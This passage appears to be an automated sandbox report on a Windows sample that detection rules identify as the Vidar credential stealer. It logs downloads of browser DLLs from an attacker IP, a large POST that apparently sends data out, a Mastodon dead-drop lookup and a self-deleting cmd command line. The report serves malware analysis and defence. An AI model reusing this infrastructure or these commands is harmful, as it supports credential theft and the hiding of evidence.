                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8d c2 55 b1 c9 a3 3b e2 c9 a3 3b e2 c9 a3 3b e2 c0 db a8 e2 d9 a3 3b e2 57 03 fc e2 cb a3 3b e2 10 c1 38 e3 c7 a3 3b e2 10 c1 3f e3 c2 a3 3b e2 10 c1 3a e3 cd a3 3b e2 10 c1 3e e3 db a3 3b e2 eb c3 3a e3 c0 a3 3b e2 c9 a3 3a e2 77 a3 3b e2 02 c0 3f e3 c8 a3 3b e2 02 c0 3e e3 dd a3 3b e2 02 c0 3b e3 c8 a3 3b e2 02 c0 c4 e2 c8 a3 3b e2 02 c0 39 e3 c8 a3 3b e2 52 69 63 68 c9 a3 3b e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 c4 5f eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 7a 01 00 00 86 00 00 00 00 00 00 e0 82 01 00 00 10 00 00 00 90 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 02 00 00 04 00 00 16 33 02 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 c0 01 00 74 1e 00 00 b4 de 01 00 2c 01 00 00 00 20 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fa 01 00 d0 1d 00 00 00 30 02 00 68 0c 00 00 00 b9 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 b9 01 00 18 00 00 00 68 b8 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 f4 02 00 00 6c be 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ca 78 01 00 00 10 00 00 00 7a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5e 65 00 00 00 90 01 00 00 66 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 
bc 0b 00 00 00 00 02 00 00 02 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 38 00 00 00 00 10 02 00 00 02 00 00 00 e6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 20 02 00 00 04 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0c 00 00 00 30 02 00 00 0e 00 00 00 ec 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$U;;;;W;8;?;:;>;:;:w;?;>;;;;9;Rich;PEL_["!z@3@A@t, x0hTTh@l.textxz `.rdata^ef~@@.data@.didat8@.rsrcx @@.reloch0@B
                                                                                                                                            Sep 27, 2021 18:33:08.769380093 CEST  1465  OUT  GET /msvcp140.dll HTTP/1.1
                                                                                                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                            Host: 23.88.105.196
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Sep 27, 2021 18:33:08.790802002 CEST  1466  IN  HTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Mon, 27 Sep 2021 16:33:08 GMT
                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                            Content-Length: 440120
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
                                                                                                                                            ETag: "6b738-57aa1f0b0df80"
                                                                                                                                            Expires: Tue, 28 Sep 2021 16:33:08 GMT
                                                                                                                                            Cache-Control: max-age=86400
                                                                                                                                            X-Cache-Status: EXPIRED
                                                                                                                                            X-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a6 c8 bc 41 e2 a9 d2 12 e2 a9 d2 12 e2 a9 d2 12 56 35 3d 12 e0 a9 d2 12 eb d1 41 12 fa a9 d2 12 3b cb d3 13 e1 a9 d2 12 e2 a9 d3 12 22 a9 d2 12 3b cb d1 13 eb a9 d2 12 3b cb d6 13 ee a9 d2 12 3b cb d7 13 f4 a9 d2 12 3b cb da 13 95 a9 d2 12 3b cb d2 13 e3 a9 d2 12 3b cb 2d 12 e3 a9 d2 12 3b cb d0 13 e3 a9 d2 12 52 69 63 68 e2 a9 d2 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 16 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 04 06 00 00 82 00 00 00 00 00 00 50 b1 03 00 00 10 00 00 00 20 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 61 7a 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 43 04 00 82 cf 01 00 f4 52 06 00 2c 01 00 00 00 80 06 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 78 06 00 38 3f 00 00 00 90 06 00 34 3a 00 00 f0 66 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 28 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 06 00 f0 02 00 00 98 40 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 03 06 00 00 10 00 00 00 04 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 10 28 00 00 00 20 06 00 00 18 00 00 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 36 14 00 00 00 50 06 00 00 16 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 
2e 64 69 64 61 74 00 00 34 00 00 00 00 70 06 00 00 02 00 00 00 36 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 03 00 00 00 80 06 00 00 04 00 00 00 38 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 3a 00 00 00 90 06 00 00 3c 00 00 00 3c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$AV5=A;";;;;;;-;RichPEL8'Y"!P az@ACR,x8?4:f8(@P@@.textr `.data( @.idata6P @@.didat4p6@.rsrc8@@.reloc4:<<@B
                                                                                                                                            Sep 27, 2021 18:33:09.061364889 CEST  1920  OUT  GET /nss3.dll HTTP/1.1
                                                                                                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                            Host: 23.88.105.196
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Sep 27, 2021 18:33:09.082881927 CEST  1922  IN  HTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Mon, 27 Sep 2021 16:33:09 GMT
                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                            Content-Length: 1246160
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
                                                                                                                                            ETag: "1303d0-57aa1f0b0df80"
                                                                                                                                            Expires: Tue, 28 Sep 2021 16:33:09 GMT
                                                                                                                                            Cache-Control: max-age=86400
                                                                                                                                            X-Cache-Status: EXPIRED
                                                                                                                                            X-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 83 34 8c 67 e2 5a df 67 e2 5a df 67 e2 5a df 6e 9a c9 df 73 e2 5a df be 80 5b de 65 e2 5a df f9 42 9d df 63 e2 5a df be 80 59 de 6a e2 5a df be 80 5f de 6d e2 5a df be 80 5e de 6c e2 5a df 45 82 5b de 6f e2 5a df ac 81 5b de 64 e2 5a df 67 e2 5b df 90 e2 5a df ac 81 5e de 6d e3 5a df ac 81 5a de 66 e2 5a df ac 81 a5 df 66 e2 5a df ac 81 58 de 66 e2 5a df 52 69 63 68 67 e2 5a df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ad 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 0e 00 00 1e 04 00 00 00 00 00 77 f0 0e 00 00 10 00 00 00 00 0f 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 13 00 00 04 00 00 b7 bb 13 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 9d 11 00 88 a0 00 00 88 3d 12 00 54 01 00 00 00 b0 12 00 70 03 00 00 00 00 00 00 00 00 00 00 00 e6 12 00 d0 1d 00 00 00 c0 12 00 14 7d 00 00 70 97 11 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 97 11 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 81 e8 0e 00 00 10 00 00 00 ea 0e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 10 52 03 00 00 00 0f 00 00 54 03 00 00 ee 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 47 00 00 00 60 12 00 
00 22 00 00 00 42 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 03 00 00 00 b0 12 00 00 04 00 00 00 64 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 14 7d 00 00 00 c0 12 00 00 7e 00 00 00 68 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$#4gZgZgZnsZ[eZBcZYjZ_mZ^lZE[oZ[dZg[Z^mZZfZfZXfZRichgZPELb["!w@@=Tp}pT@.text `.rdataRT@@.datatG`"B@.rsrcpd@@.reloc}~h@B
                                                                                                                                            Sep 27, 2021 18:33:10.104836941 CEST  3264  OUT  GET /softokn3.dll HTTP/1.1
                                                                                                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                            Host: 23.88.105.196
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Sep 27, 2021 18:33:10.126363993 CEST  3265  IN  HTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Mon, 27 Sep 2021 16:33:10 GMT
                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                            Content-Length: 144848
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
                                                                                                                                            ETag: "235d0-57aa1f0b0df80"
                                                                                                                                            Expires: Tue, 28 Sep 2021 16:33:10 GMT
                                                                                                                                            Cache-Control: max-age=86400
                                                                                                                                            X-Cache-Status: EXPIRED
                                                                                                                                            X-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
Sep 27, 2021 18:33:10.232507944 CEST | 3416 | OUT | GET /vcruntime140.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Host: 23.88.105.196
Connection: Keep-Alive
Sep 27, 2021 18:33:10.254276991 CEST | 3417 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 27 Sep 2021 16:33:10 GMT
Content-Type: application/x-msdos-program
Content-Length: 83784
Connection: keep-alive
Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
ETag: "14748-57aa1f0b0df80"
Expires: Tue, 28 Sep 2021 16:33:10 GMT
Cache-Control: max-age=86400
X-Cache-Status: EXPIRED
X-Cache-Status: HIT
Accept-Ranges: bytes
Sep 27, 2021 18:33:17.113476992 CEST | 3503 | OUT | POST / HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 86263
Host: 23.88.105.196
Connection: Keep-Alive
Cache-Control: no-cache
Sep 27, 2021 18:33:17.362571955 CEST | 3589 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 27 Sep 2021 16:33:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Content-Encoding: gzip
Data Raw: 31 36 0d 0a 1f 8b 08 00 00 00 00 00 04 03 cb cf 06 00 47 dd dc 79 02 00 00 00 0d 0a 30 0d 0a 0d 0a
Data Ascii: 16Gy0


HTTPS Proxied Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.6 | 49740 | 88.99.75.82 | 443 | C:\Users\user\Desktop\T6zZFfRLqs.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-27 16:33:07 UTC | 0 | OUT | GET /@killern0 HTTP/1.1
Host: mas.to
2021-09-27 16:33:08 UTC | 0 | IN | HTTP/1.1 200 OK
Date: Mon, 27 Sep 2021 16:33:08 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Server: Mastodon
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Permissions-Policy: interest-cohort=()
Link: <https://mas.to/.well-known/webfinger?resource=acct%3Akillern0%40mas.to>; rel="lrdd"; type="application/jrd+json", <https://mas.to/users/killern0>; rel="alternate"; type="application/activity+json"
Vary: Accept, Accept-Encoding, Origin
Cache-Control: max-age=0, public
ETag: W/"e73efba249baae2326e4e19544f6451b"
Content-Security-Policy: base-uri 'none'; default-src 'none'; frame-ancestors 'none'; font-src 'self' https://mas.to; img-src 'self' https: data: blob: https://mas.to; style-src 'self' https://mas.to 'nonce-qA4p2YJsld36ae3JZC7g3w=='; media-src 'self' https: data: https://mas.to; frame-src 'self' https:; manifest-src 'self' https://mas.to; connect-src 'self' data: blob: https://mas.to https://media.mas.to wss://mas.to; script-src 'self' https://mas.to; child-src 'self' blob: https://mas.to; worker-src 'self' blob: https://mas.to
Set-Cookie: _mastodon_session=RIakeF43yB5z3DKgswfIwsUWuipKimb3U36IDPe3BnfqFVo5V%2B9JbHD7sCjas8o4uv%2FUZ01SoZeGnpGrhNIT7YlNqQgmsvtKXeBeS67xlevWKgMAL3hhCi1rys%2FAyZ1bhx8uw5Np%2FqqDrCJk%2FqHfHxLvfoZY7fWdird%2B8Lp8GVfMTwAuifqcVTrDGOCQ9sKHR0tDxAv6QjZ7OZKU%2Bi8wTI2X%2FrtE%2FPvG1Ebwkc1dcZdGw0senq2NpBe4WQ4CbHTZeld8UjjiuG%2FyFzDPmvz0tbmrP2dRr8r29PLXoYOlK5ptiGIQB%2BI6ry0UPC4xYqlnhFXeGqNpMEOAkRYGdZ9jIxheqzRy7i3tzYiYGHcDYqqItjR6SA%3D%3D--Zv8ToGmxUq3yG4sm--A%2Fz4zfpZIAawpeM%2BJ4VnYA%3D%3D; path=/; secure; HttpOnly; SameSite=Lax
X-Request-Id: 5ca77ef3-9a25-46ab-b7a5-6919b1fd0707
X-Runtime: 0.052058
Strict-Transport-Security: max-age=63072000; includeSubDomains
X-Cached: MISS
Strict-Transport-Security: max-age=31536000


Behavior

System Behavior

General

Start time: 18:32:58
Start date: 27/09/2021
Path: C:\Users\user\Desktop\T6zZFfRLqs.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\T6zZFfRLqs.exe'
Imagebase: 0x400000
File size: 599552 bytes
MD5 hash: 5D5E83E151A99BED97E13839E8881CB5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.397797115.00000000007E2000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.397914082.00000000021F0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000003.361677453.0000000002330000.00000004.00000001.sdmp, Author: Joe Security
Reputation: low

General

Start time: 18:33:19
Start date: 27/09/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: 'C:\Windows\System32\cmd.exe' /c taskkill /im T6zZFfRLqs.exe /f & timeout /t 6 & del /f /q 'C:\Users\user\Desktop\T6zZFfRLqs.exe' & del C:\ProgramData\*.dll & exit
Imagebase: 0x2a0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 18:33:19
Start date: 27/09/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff61de10000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 18:33:19
Start date: 27/09/2021
Path: C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit): true
Commandline: taskkill /im T6zZFfRLqs.exe /f
Imagebase: 0xaa0000
File size: 74752 bytes
MD5 hash: 15E2E0ACD891510C6268CB8899F2A1A1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 18:33:20
Start date: 27/09/2021
Path: C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit): true
Commandline: timeout /t 6
Imagebase: 0x1000000
File size: 26112 bytes
MD5 hash: 121A4EDAE60A7AF6F5DFA82F7BB95659
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Disassembly

Code Analysis
